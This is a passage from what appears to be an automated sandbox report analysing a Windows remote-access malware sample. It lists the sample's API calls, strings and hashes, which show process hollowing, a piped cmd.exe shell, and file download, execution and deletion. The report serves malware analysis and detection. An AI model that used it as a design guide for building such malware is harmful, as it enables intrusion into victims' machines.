47029 442554 47016->47029 47017 44254e 47049 456499 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 47017->47049 47025->47012 47050 444b14 LeaveCriticalSection 47026->47050 47028 44251e 47028->47016 47028->47017 47051 447973 47029->47051 47032 442582 47035 4425d9 _Atexit 8 API calls 47032->47035 47033 442562 GetPEB 47033->47032 47034 442572 GetCurrentProcess TerminateProcess 47033->47034 47034->47032 47036 44258a ExitProcess 47035->47036 47037->47007 47039 442626 47038->47039 47040 442603 GetProcAddress 47038->47040 47041 442635 47039->47041 47042 44262c FreeLibrary 47039->47042 47043 442618 47040->47043 47044 433d2c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47041->47044 47042->47041 47043->47039 47045 44245f 47044->47045 47045->47003 47046->47014 47047->47015 47048->47008 47050->47028 47052 447998 47051->47052 47056 44798e 47051->47056 47057 447174 47052->47057 47054 433d2c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 47055 44255e 47054->47055 47055->47032 47055->47033 47056->47054 47058 4471a0 47057->47058 47059 4471a4 47057->47059 47058->47059 47062 4471c4 47058->47062 47064 447210 47058->47064 47059->47056 47061 4471d0 GetProcAddress 47063 4471e0 __crt_fast_encode_pointer 47061->47063 47062->47059 47062->47061 47063->47059 47065 447231 LoadLibraryExW 47064->47065 47067 447226 47064->47067 47066 44724e GetLastError 47065->47066 47068 447266 47065->47068 47066->47068 47069 447259 LoadLibraryExW 47066->47069 47067->47058 47068->47067 47070 44727d FreeLibrary 47068->47070 47069->47068 47070->47067

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                          • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                          • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                          • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                          • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                          • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                          • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                          • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                                          • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                          • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleLibraryLoadModule
                                                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                          • API String ID: 384173800-625181639
                                                                          • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                          • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                          • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                          • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(?,?,0044252A,?), ref: 00442575
                                                                          • TerminateProcess.KERNEL32(00000000,?,0044252A,?), ref: 0044257C
                                                                          • ExitProcess.KERNEL32 ref: 0044258E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Process$CurrentExitTerminate
                                                                          • String ID:
                                                                          • API String ID: 1703294689-0
                                                                          • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                          • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                          • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                          • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,00475B70,?,?,00000000,00475B70,004017F3), ref: 004047FD
                                                                          • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404808
                                                                          • CloseHandle.KERNELBASE(?,?,?,00000000,00475B70,004017F3), ref: 00404811
                                                                          • closesocket.WS2_32(?), ref: 0040481F
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 00404856
                                                                          • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404867
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00000000,00475B70,004017F3), ref: 0040486E
                                                                          • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404880
                                                                          • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404885
                                                                          • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 0040488A
                                                                          • SetEvent.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 00404895
                                                                          • CloseHandle.KERNEL32(?,?,?,00000000,00475B70,004017F3), ref: 0040489A
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                          • String ID:
                                                                          • API String ID: 3658366068-0
                                                                          • Opcode ID: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                                          • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                          • Opcode Fuzzy Hash: 064d6b1f915996a70041b40538a6eeea030a706771223880b65586d948e925f6
                                                                          • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 22 447210-447224 23 447226-44722f 22->23 24 447231-44724c LoadLibraryExW 22->24 27 447288-44728a 23->27 25 447275-44727b 24->25 26 44724e-447257 GetLastError 24->26 30 447284 25->30 31 44727d-44727e FreeLibrary 25->31 28 447266 26->28 29 447259-447264 LoadLibraryExW 26->29 32 447268-44726a 28->32 29->32 33 447286-447287 30->33 31->30 32->25 34 44726c-447273 32->34 33->27 34->33
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                          • GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LibraryLoad$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 3177248105-0
                                                                          • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                          • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                          • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                          • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 35 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                                                                          APIs
                                                                          • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                          • GetLastError.KERNEL32 ref: 0040BEF1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateErrorLastMutex
                                                                          • String ID: (CG
                                                                          • API String ID: 1925916568-4210230975
                                                                          • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                          • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                          • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                          • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 46 447174-44719e 47 4471a0-4471a2 46->47 48 447209 46->48 49 4471a4-4471a6 47->49 50 4471a8-4471ae 47->50 51 44720b-44720f 48->51 49->51 52 4471b0-4471b2 call 447210 50->52 53 4471ca 50->53 56 4471b7-4471ba 52->56 55 4471cc-4471ce 53->55 57 4471d0-4471de GetProcAddress 55->57 58 4471f9-447207 55->58 59 4471bc-4471c2 56->59 60 4471eb-4471f1 56->60 61 4471e0-4471e9 call 4333a7 57->61 62 4471f3 57->62 58->48 59->52 63 4471c4 59->63 60->55 61->49 62->58 63->53
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004471D4
                                                                          • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004471E1
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AddressProc__crt_fast_encode_pointer
                                                                          • String ID:
                                                                          • API String ID: 2279764990-0
                                                                          • Opcode ID: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                                          • Instruction ID: 6f7a2b722a2a1d8c8194c8cb68bd8fc2eac5a8381c6f9e3e6965fab01942ac9c
                                                                          • Opcode Fuzzy Hash: d60c3e2bfe9cc093b3110c1e14b53e816b2a5bac2969881e56f7ec686a65f544
                                                                          • Instruction Fuzzy Hash: 8A110233A041629BFB329F68EC4099B7395AB803747164672FD19AB344DB34EC4386E9

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                                            • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,1DC,?,00475B70,00473D54,00000000,?,?,?,?,00434431,?,0046D680,?), ref: 00437C37
                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Exception@8Throw$ExceptionRaise
                                                                          • String ID:
                                                                          • API String ID: 3476068407-0
                                                                          • Opcode ID: 0c813f605dd2a6606fe246f0cee3a0605bca7c2744777b4a7d98c309a0a34cf7
                                                                          • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                                          • Opcode Fuzzy Hash: 0c813f605dd2a6606fe246f0cee3a0605bca7c2744777b4a7d98c309a0a34cf7
                                                                          • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 86 44eeb5-44eec2 call 448706 88 44eec7-44eed2 86->88 89 44eed4-44eed6 88->89 90 44eed8-44eee0 88->90 91 44ef20-44ef2e call 446ac5 89->91 90->91 92 44eee2-44eee6 90->92 94 44eee8-44ef1a call 44772e 92->94 98 44ef1c-44ef1f 94->98 98->91
                                                                          APIs
                                                                            • Part of subcall function 00448706: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F74,00000001,00000364,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08), ref: 00448747
                                                                          • _free.LIBCMT ref: 0044EF21
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap_free
                                                                          • String ID:
                                                                          • API String ID: 614378929-0
                                                                          • Opcode ID: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
                                                                          • Instruction ID: 91765bf56145836b352927287b0900a7be963fc320189fecf9c5ab0789588b10
                                                                          • Opcode Fuzzy Hash: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
                                                                          • Instruction Fuzzy Hash: 2D01DB771043056BF321CF66984595AFBD9FB8A370F65051EE59453280EB34A806C778

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 99 448706-448711 100 448713-44871d 99->100 101 44871f-448725 99->101 100->101 102 448753-44875e call 445354 100->102 103 448727-448728 101->103 104 44873e-44874f RtlAllocateHeap 101->104 109 448760-448762 102->109 103->104 105 448751 104->105 106 44872a-448731 call 4447c5 104->106 105->109 106->102 112 448733-44873c call 442200 106->112 112->102 112->104
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00446F74,00000001,00000364,?,0043A846,00000000,00000000,00000000,00000000,00000000,00000000,00402C08), ref: 00448747
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
                                                                          • Instruction ID: 09342868e9f2d6cc7f7b696f5049c05c0568eaa44df27644d65b9450949fa691
                                                                          • Opcode Fuzzy Hash: de2f67f7923a31b36d9b5f834b48d2b0e0f5da7a677d300afd471130a21967f0
                                                                          • Instruction Fuzzy Hash: 9CF0E93250412467BB216A369D55B5F7748AF427B0B34802BFC08EA691DF68DD4182ED

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 115 446aff-446b0b 116 446b3d-446b48 call 445354 115->116 117 446b0d-446b0f 115->117 125 446b4a-446b4c 116->125 118 446b11-446b12 117->118 119 446b28-446b39 RtlAllocateHeap 117->119 118->119 121 446b14-446b1b call 4447c5 119->121 122 446b3b 119->122 121->116 127 446b1d-446b26 call 442200 121->127 122->125 127->116 127->119
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                                          • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                          • Opcode Fuzzy Hash: dc6ea950822f8571e228d4b4fa6025b1dc9324ca9cf531c4426aa18bd07b2452
                                                                          • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                                          APIs
                                                                          • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                          • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                          • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                            • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
                                                                            • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
                                                                            • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C
                                                                            • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
                                                                            • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
                                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                            • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                            • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                            • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                            • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                            • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                            • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                            • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                          • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                          • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                          • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                            • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                            • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                            • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                          • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                          • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                            • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                          • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                          • API String ID: 2918587301-599666313
                                                                          • Opcode ID: f36fb64b3db194b454ae9eb28d75c81c9cc8faab535ad814f62d7d0444d5b432
                                                                          • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                          • Opcode Fuzzy Hash: f36fb64b3db194b454ae9eb28d75c81c9cc8faab535ad814f62d7d0444d5b432
                                                                          • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                          APIs
                                                                          • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                            • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                                            • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                                            • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                          • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                          • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                          • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                            • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                                            • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                          • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                            • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                          • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                          • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                          • CloseHandle.KERNEL32 ref: 004053CD
                                                                          • CloseHandle.KERNEL32 ref: 004053D5
                                                                          • CloseHandle.KERNEL32 ref: 004053E7
                                                                          • CloseHandle.KERNEL32 ref: 004053EF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                          • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                          • API String ID: 3815868655-81343324
                                                                          • Opcode ID: bfcb8ec680749e1ff3d96b83f6722c7489f5814a8e376730b38478a1694e7e9c
                                                                          • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                          • Opcode Fuzzy Hash: bfcb8ec680749e1ff3d96b83f6722c7489f5814a8e376730b38478a1694e7e9c
                                                                          • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                          APIs
                                                                          • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                            • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                            • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                            • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                          • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                          • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                            • Part of subcall function 004124B7: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
